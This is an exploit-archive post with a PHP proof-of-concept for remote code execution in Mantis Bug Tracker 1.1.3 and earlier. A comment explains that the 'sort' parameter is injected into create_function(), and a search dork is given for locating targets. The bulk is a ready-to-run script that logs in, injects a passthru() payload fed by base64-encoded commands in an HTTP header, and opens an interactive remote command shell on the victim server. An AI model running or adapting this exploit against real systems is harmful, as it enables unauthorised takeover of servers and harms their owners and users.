Home / exploits mantis-exec.txt
Posted on 17 October 2008
<?php /* -------------------------------------------------------------------------------- Mantis Bug Tracker <= 1.1.3 (manage_proj_page.php) Remote Code Execution Exploit -------------------------------------------------------------------------------- author...: EgiX mail.....: n0b0d13s[at]gmail[dot]com link.....: http://www.mantisbt.org/ dork.....: "Powered by Mantis Bugtracker" This PoC was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. [-] vulnerable code in /manage_proj_page.php 32. $f_sort = gpc_get_string( 'sort', 'name' ); <=== this is taken and stripslashed from $_GET['sort'] 33. $f_dir = gpc_get_string( 'dir', 'ASC' ); (...) 89. $t_projects = multi_sort( $t_full_projects, $f_sort, $t_direction ); <=== and here is passed to multi_sort() 90. $t_stack = array( $t_projects ); [-] multi_sort() function defined into /core/utility_api.php 185. # -------------------- 186. # Sort a multi-dimensional array by one of its keys 187. function multi_sort( $p_array, $p_key, $p_direction=ASCENDING ) { 188. if ( DESCENDING == $p_direction ) { 189. $t_factor = -1; 190. } else { 191. # might as well allow everything else to mean ASC rather than erroring 192. $t_factor = 1; 193. } 194. 195. $t_function = create_function( '$a, $b', "return $t_factor * strnatcasecmp( $a['$p_key'], $b['$p_key'] );" ); 196. uasort( $p_array, $t_function ); 197. return $p_array; 198. } An attacker could be able to inject and execute PHP code through $_GET['sort'], that is passed to create_function() at line 195 into multi_sort() function body. By default only registered users can access to manage_proj_page.php (I've tested this on 1.1.3 version), because of this sometimes this PoC works only with a valid account. */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); define(STDIN, fopen("php://stdin", "r")); function http_send($host, $packet) { $sock = fsockopen($host, 80); while (!$sock) { print " [-] No response from {$host}:80 Trying again..."; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1024); fclose($sock); return $resp; } function check_login() { global $host, $path, $user, $pass, $cookie; $packet = "GET {$path}manage_proj_page.php HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Connection: close "; if (preg_match("/Location: login_page.php/", http_send($host, $packet))) { if (isset($pass)) { $payload = "username={$user}&password={$pass}"; $packet = "POST {$path}login.php HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Cookie: PHPSESSID=".md5("foo")." "; $packet .= "Content-Type: application/x-www-form-urlencoded "; $packet .= "Content-Length: ".strlen($payload)." "; $packet .= "Connection: close "; $packet .= $payload; if (!preg_match("/Set-Cookie: (.*);/", http_send($host, $packet), $match)) die(" [-] Login failed... "); $cookie = $match[1]; } else die(" [-] Credentials needed... "); } } print " +-------------------------------------------------------------------+"; print " | Mantis Bug Tracker <= 1.1.3 Remote Code Execution Exploit by EgiX |"; print " +-------------------------------------------------------------------+ "; if ($argc < 3) { print " Usage......: php $argv[0] host path [user] [password] "; print " Example....: php $argv[0] localhost /mantis/"; print " Example....: php $argv[0] localhost / user pass "; die(); } $host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $pass = $argv[4]; check_login(); $code = "']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%%23"; $packet = "GET {$path}manage_proj_page.php?sort={$code} HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Cookie: PHPSESSID=".md5("foo").(isset($cookie) ? "; {$cookie}" : "")." "; $packet .= "Cmd: %s "; $packet .= "Connection: close "; while(1) { print " mantis-shell# "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") { $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die(" [-] Exploit failed... "); } else break; } ?>
